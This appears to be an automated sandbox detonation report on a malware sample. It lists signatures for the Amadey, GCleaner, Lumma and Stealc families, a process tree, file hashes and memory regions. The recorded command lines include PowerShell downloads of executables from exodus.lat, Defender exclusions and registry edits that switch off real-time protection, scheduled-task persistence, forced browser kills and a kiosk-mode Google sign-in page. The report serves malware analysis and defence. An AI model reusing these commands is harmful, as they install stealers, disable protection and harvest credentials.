PID 2396 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2396 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2396 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2396 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2300 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe
PID 2300 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe
PID 2300 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe
PID 2300 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe
PID 2300 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2300 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2300 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2300 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2300 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2300 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2300 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 852 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp
PID 852 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp
PID 852 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp
PID 852 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp
PID 852 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp
PID 852 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp
PID 852 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp
PID 1072 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp C:\Windows\SysWOW64\net.exe
PID 1072 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp C:\Windows\SysWOW64\net.exe
PID 1072 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp C:\Windows\SysWOW64\net.exe
PID 1072 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp C:\Windows\SysWOW64\net.exe
PID 1072 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
PID 1072 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
PID 1612 wrote to memory of 1652 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2300 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 2392 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 2528 wrote to memory of 964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2528 wrote to memory of 860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2528 wrote to memory of 2540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2528 wrote to memory of 2188 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2528 wrote to memory of 1960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2528 wrote to memory of 1592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe

"C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe

"C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe"

C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe

"C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"

C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp

"C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp" /SL5="$70016,3291517,54272,C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" pause raf_encoder_1252

C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe

"C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe" -i

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 pause raf_encoder_1252

C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe

"C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 491505

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B

C:\Users\Admin\AppData\Local\Temp\491505\Dr.com

Dr.com B

C:\Windows\SysWOW64\choice.exe

choice /d y /t 15

C:\Windows\SysWOW64\cmd.exe

cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST

C:\Users\Admin\AppData\Local\Temp\1012618001\51f22cedd5.exe

"C:\Users\Admin\AppData\Local\Temp\1012618001\51f22cedd5.exe"

C:\Users\Admin\AppData\Local\Temp\1012619001\9eb85c1ad3.exe

"C:\Users\Admin\AppData\Local\Temp\1012619001\9eb85c1ad3.exe"

C:\Users\Admin\AppData\Local\Temp\1012620001\992d57873c.exe

"C:\Users\Admin\AppData\Local\Temp\1012620001\992d57873c.exe"

C:\Users\Admin\AppData\Local\Temp\1012621001\916674a606.exe

"C:\Users\Admin\AppData\Local\Temp\1012621001\916674a606.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2556.0.1472480283\1121752671" -parentBuildID 20221007134813 -prefsHandle 1160 -prefMapHandle 1120 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b5690310-0ac1-4459-8ac9-430dca97c76a} 2556 "\\.\pipe\gecko-crash-server-pipe.2556" 1296 105e3058 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2556.1.2100502362\1460789389" -parentBuildID 20221007134813 -prefsHandle 1488 -prefMapHandle 1484 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4c7e296c-6d49-4078-a606-bd84890ad74d} 2556 "\\.\pipe\gecko-crash-server-pipe.2556" 1516 f2eb858 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2556.2.2080604979\1613612624" -childID 1 -isForBrowser -prefsHandle 2060 -prefMapHandle 2056 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 588 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {318ee21d-a883-4d75-97a4-e9511f90e6a2} 2556 "\\.\pipe\gecko-crash-server-pipe.2556" 2072 1989c358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2556.3.882223744\1212379421" -childID 2 -isForBrowser -prefsHandle 2908 -prefMapHandle 2904 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 588 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {73529d3c-e4b3-4838-90bc-83ac4512df0a} 2556 "\\.\pipe\gecko-crash-server-pipe.2556" 2920 e6ad58 tab

C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe

"C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2556.4.118757683\1716330966" -childID 3 -isForBrowser -prefsHandle 3752 -prefMapHandle 3748 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 588 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d6edbab0-8e75-409a-9e6e-555367ec6130} 2556 "\\.\pipe\gecko-crash-server-pipe.2556" 3764 1f7e3a58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2556.5.58095989\1072028084" -childID 4 -isForBrowser -prefsHandle 3872 -prefMapHandle 3876 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 588 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {39f6b65f-cceb-41e1-ba96-319482cc4110} 2556 "\\.\pipe\gecko-crash-server-pipe.2556" 3860 1f7e9558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2556.6.462080222\1802175039" -childID 5 -isForBrowser -prefsHandle 4048 -prefMapHandle 4052 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 588 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e04e6303-925c-42ee-bdb6-8db23ce3b9f6} 2556 "\\.\pipe\gecko-crash-server-pipe.2556" 4036 1f7ea458 tab

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\download.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\runsteal.bat" "

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat" "

C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

"C:\Users\Admin\AppData\Local\Temp\smartscreen.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\tasklist.exe

tasklist /fi "imagename eq mi.exe"

C:\Windows\SysWOW64\find.exe

find /i "mi.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"

Network

Country Destination Domain Proto

Files


memory/2928-841-0x0000000000400000-0x00000000006DF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 a01c5ecd6108350ae23d2cddf0e77c17
SHA1 c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512 b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

MD5 8be33af717bb1b67fbd61c3f4b807e9e
SHA1 7cf17656d174d951957ff36810e874a134dd49e0
SHA256 e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

MD5 33bf7b0439480effb9fb212efce87b13
SHA1 cee50f2745edc6dc291887b6075ca64d716f495a
SHA256 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512 d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

MD5 688bed3676d2104e7f17ae1cd2c59404
SHA1 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA512 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

MD5 937326fead5fd401f6cca9118bd9ade9
SHA1 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512 b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

memory/4020-880-0x00000000003C0000-0x00000000007C4000-memory.dmp

memory/4020-883-0x00000000003C0000-0x00000000007C4000-memory.dmp

memory/4020-882-0x00000000003C0000-0x00000000007C4000-memory.dmp

memory/4020-886-0x00000000008E0000-0x00000000008EE000-memory.dmp

memory/4020-887-0x0000000001120000-0x000000000117C000-memory.dmp

memory/4020-888-0x00000000009F0000-0x0000000000A02000-memory.dmp

memory/4020-889-0x0000000000A50000-0x0000000000A58000-memory.dmp

memory/4020-890-0x0000000000A60000-0x0000000000A68000-memory.dmp

memory/4020-891-0x0000000000A70000-0x0000000000A78000-memory.dmp

memory/4020-892-0x0000000000A80000-0x0000000000A98000-memory.dmp

memory/4020-893-0x0000000000EA0000-0x0000000000EB0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\prefs-1.js

MD5 409083e8184d718a6fcc1556ed8f3c01
SHA1 de4cf88e68a9b5f824e5db7fa213fe17d4d417e2
SHA256 e3dca45bb057f11a9c6f9c1066efa848c552ecf2180158b2e1b60643840d752c
SHA512 972dcf079d51268e287cbf4555ecb68635e957ab7ff360acf8c90b04cd54ccbb49f78e7224031d68aa949da6666c6dc2316880b45946e1e51303148259e0a747

C:\Users\Admin\AppData\Local\Temp\CabD693.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/2300-919-0x0000000000A90000-0x0000000000F35000-memory.dmp

memory/1204-923-0x0000000000400000-0x0000000000C7E000-memory.dmp

memory/2928-924-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2928-926-0x0000000002B40000-0x0000000002BE1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\download.bat

MD5 f2a75175c8082ccd3e1713b00556a6e2
SHA1 2f5dc37978320bc1ca207c0c0aff1240aad6c7cf
SHA256 019157c15709f7d6301cb0fb15f45c054230ea91f06ff817b426d7f6ccb14686
SHA512 011ab44e81d61636d5b1637584faf0701a5b2226289b6200cd89ad97927f52f1c659df626afc2b46edd656960d67934fff97f5e10fd6a7454027d430feafa7a9

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 4f60802c8c95046fdf586445fd37cdb1
SHA1 b96daa6f50eb6586e9be452fb5cf10a5f671415a
SHA256 727e58c010ea14c632113bfdac4c97577c20f0b8349c1ad8a3fbd3fe94ff4fdb
SHA512 8f2761416c336d1eb324678807df1fa3a45da4ee71380470ce8271decd24af70f0a868b2cb90290b6e9b1b7f2db27626cba91c9d97978ebdd6c8c535b70ecca7

C:\Users\Admin\AppData\Local\Temp\runsteal.bat

MD5 744f8978db36b4b9db7cb6e5c8c41e08
SHA1 84321921f622d20a4d40c9bef43b7744e74aaee7
SHA256 cedfe277f8c600679365ce2c54a9c303907a0acadc23ed6e6968746d2e8ca468
SHA512 d1584b2134bf3960af33a514b3a9fba69c7eb2fbbc3b0cffe7e493f182b20547f7596012fcc5e6b5ffbefee5a0b7d1afe45eee822cff5b0720ffd6292af2394f

C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat

MD5 d1fdfad5ce7134b1ef5a54cf37001031
SHA1 82e0f4e953b3aeaca622ec071639baf6ae17aadb
SHA256 54f8474d983dc3dd78e3d3289076152651e2f8cc5f30ae3f2740ba15e71cc6a6
SHA512 b6b7b4f134a6b436cd32e39fb645d91acc12482d352158a755359d0f6cbb8fd5bab9351081916b0b638e3ff2bde4b6ac2f6202f3ca58f1146f39defc039e88e7

C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

MD5 1fed66d1f6b85bda20fe0403ca01c9bd
SHA1 6a3056191a7d8da167285b2bf5f9fa671022c8c1
SHA256 924ee12f6a98aeeb1c7836ec8984f0f93216bfff0433bcd4ee643d33d96db74a
SHA512 0fb1397078689a52d1c77cc239b1e42afa5ff87a3f5b4f825705e9bda1bd2c58bfb50a6067ea0a202fa7edb0a890cbac9314413fc8757c8b75a43fa0b12ef613

memory/3976-972-0x0000000000020000-0x000000000004E000-memory.dmp

memory/2300-989-0x0000000000A90000-0x0000000000F35000-memory.dmp

memory/1204-992-0x0000000000400000-0x0000000000C7E000-memory.dmp

memory/2928-993-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2300-996-0x0000000000A90000-0x0000000000F35000-memory.dmp

memory/1204-999-0x0000000000400000-0x0000000000C7E000-memory.dmp

memory/2928-1000-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2300-1009-0x0000000000A90000-0x0000000000F35000-memory.dmp

memory/1204-1015-0x0000000000400000-0x0000000000C7E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-06 05:58

Reported

2024-12-06 06:00

Platform

win10v2004-20241007-en

Max time kernel

118s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A

Stealc

stealer stealc

Stealc family

stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012618001\3a3df0a5b6.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012619001\834d52b622.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012619001\834d52b622.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012619001\834d52b622.exe N/A
